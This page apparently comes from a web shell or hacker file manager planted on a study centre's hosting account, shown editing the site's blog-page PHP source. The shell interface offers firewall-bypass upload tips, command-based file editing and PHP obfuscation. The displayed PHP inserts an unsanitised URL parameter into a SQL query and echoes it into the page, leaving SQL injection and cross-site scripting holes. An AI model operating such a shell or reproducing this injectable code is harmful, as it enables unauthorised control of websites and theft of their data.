Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
home
u820220146
domains
sanketstudycentre.com
public_html
File Name:
<?php require_once 'db.php'; $title = str_replace('-', ' ', $_GET['title']); $title = rtrim($title, '.php'); $title = ucwords($title); ?> <!DOCTYPE html> <html dir="ltr" lang="en"> <head> <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-YCTJTVJXF5"></script> <script> window.dataLayer = window.dataLayer || []; function gtag() { dataLayer.push(arguments); } gtag('js', new Date()); gtag('config', 'G-YCTJTVJXF5'); </script> <base href="https://sanketstudycentre.com/"> <?php include 'meta.php'; ?> <title><?php echo $title ?> - Sanket Study Centre</title> <link href="https://db.onlinewebfonts.com/c/41ed59a29024f1d258b293b9043e8f81?family=Revue" rel="stylesheet"> <style> .courses .line-bottom:after { left: 41%; } .text-theme-color-2 { color: #761d19 !important; } .line-bottom:after { background: #761d19 !important; } .border-left-theme-color-2-3px { border-left: 3px solid #761d19 !important; } ::selection { color: #fff; background: #24404b; } h2 { color: #13232a !important; font-family: Revue !important; } .layer-overlay.overlay-dark-5::before { background-color: rgb(17 17 17 / 88%); } </style> </head> <body class> <div id="wrapper" class="clearfix"> <!-- Preloader & Header --> <?php include 'preloader.php'; include 'header.php'; ?> <?php require_once 'db.php'; $sql = "SELECT * FROM blogs WHERE title = '$title'"; $result = mysqli_query($link, $sql); $num = mysqli_num_rows($result); $row = $result->fetch_assoc(); $date = $row['last_updated']; $datetime = new DateTime($date); $day = $datetime->format('d'); $month = $datetime->format('M'); ?> <!-- Body --> <div class="main-content"> <!-- Breadcrumb --> <section class="inner-header divider parallax layer-overlay overlay-dark-5" data-bg-img="images/breadcrumb.webp"> <div class="container pt-70 pb-20"> <div class="section-content"> <div class="row"> <div class="col-md-12"> <h2 class="title text-white"><?php echo $title ?></h2> <ol class="breadcrumb text-left text-black mt-10"> <li><a href="index">Home</a></li> <li class="active text-gray-silver">Blogs</li> </ol> </div> </div> </div> </div> </section> <!-- Blog Details --> <section> <div class="container"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <div class="blog-posts single-post"> <article class="post clearfix mb-0"> <div class="entry-header"> <div class="post-thumb thumb"> <?php if ($row['image'] != null) { echo '<img src="admin/uploads/' . $row['image'] . '" clsss="img-fluid img-responsive img-fullwidth">'; } else { echo '<img src="admin/uploads/blank-image.webp" clsss="img-fluid img-responsive img-fullwidth">'; } ?> </div> </div> <div class="entry-meta pt-10"> <ul class="list-inline"> <li>Posted on: <span class="text-theme-color-2"> <?php echo $month . ' ' . $day ?></span></li> </ul> </div> <div class="entry-title"> <h3><a class="text-uppercase text-theme-color-2"><b><?php echo $title ?></b></a></h3> <p class="mb-15" style="text-align: justify;"><b><?php echo $row['short_description'] ?></b></p> </div> <?php if ($row['long_description']) { echo ' <div class="entry-content mt-10">' . $row['long_description'] . '</div>'; } ?> <!-- <div class="entry-content mt-10"> <p class="mb-15" style="text-align: justify;">Dear Students and Parents,</p> <p class="mb-15" style="text-align: justify;">We're thrilled to unveil the latest updates and enhancements here at Sanket Study Centre! As your dedicated partners in education, we continuously strive to provide the best learning experiences and resources for our students. Here's a glimpse of what's new:</p> <p class="mb-15" style="text-align: justify;"><b>1. Emotional Support and Counseling:</b> We understand that navigating the challenges of adolescence can be overwhelming at times. That's why we provide access to qualified counselors and mental health professionals who offer confidential support, guidance, and counseling services to students facing personal, academic, or emotional challenges. Our goal is to create a safe space where students feel heard, understood, and supported as they navigate life's ups and downs.</p> <p class="mb-15" style="text-align: justify;"><b>2. Health and Wellness Programs:</b> A healthy body is the foundation for a healthy mind. That's why we offer a range of health and wellness programs aimed at promoting physical fitness, nutrition, and overall well-being among our students. From yoga and meditation sessions to sports clubs and fitness activities, we encourage students to prioritize their health and adopt healthy lifestyle habits that will serve them well throughout their lives.</p> <p class="mb-15" style="text-align: justify;"><b>3. Social and Emotional Learning (SEL):</b> We recognize the importance of developing students' social and emotional competencies alongside academic skills. Through dedicated SEL programs and initiatives, we help students cultivate essential life skills such as empathy, resilience, self-awareness, and responsible decision-making. By nurturing these skills, we empower students to build healthy relationships, manage stress effectively, and navigate life's challenges with confidence and compassion.</p> <p class="mb-15" style="text-align: justify;"><b>4. Community Building and Peer Support:</b> A sense of belonging and connectedness is crucial for student well-being. That's why we foster a strong sense of community and belongingness among our students through various extracurricular activities, clubs, and social events. Through peer support networks and mentorship programs, students forge meaningful connections, build friendships, and support each other's growth and development.</p> <p class="mb-15" style="text-align: justify;"><b>5. Celebrating Diversity and Inclusion:</b> At Sanket Study Centre, we celebrate diversity and promote inclusivity in all aspects of our school community. We embrace students from diverse backgrounds, cultures, and identities and create an environment where everyone feels welcome, respected, and valued. By fostering a culture of acceptance and understanding, we empower students to embrace their uniqueness and appreciate the richness of human diversity.</p> <p>Together, let's continue to prioritize student well-being and create a nurturing learning environment where every student can thrive, flourish, and shine bright.</p> </div> --> </article> </div> </div> </div> </div> </section> </div> <!-- Footer --> <?php include 'footer.php'; ?> </div> <script src="js/custom.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.actions.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.carousel.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.kenburn.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.layeranimation.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.migration.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.navigation.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.parallax.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.slideanims.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.video.min.js"></script> </body> </html>
Bypass Options
Select edit method
Using basic write file
Using command
Info
Info!
If the strings too long, it will be failed to edit file (command method only).
Obfuscate PHP:
No Obfuscate
Obfuscate
Save Changes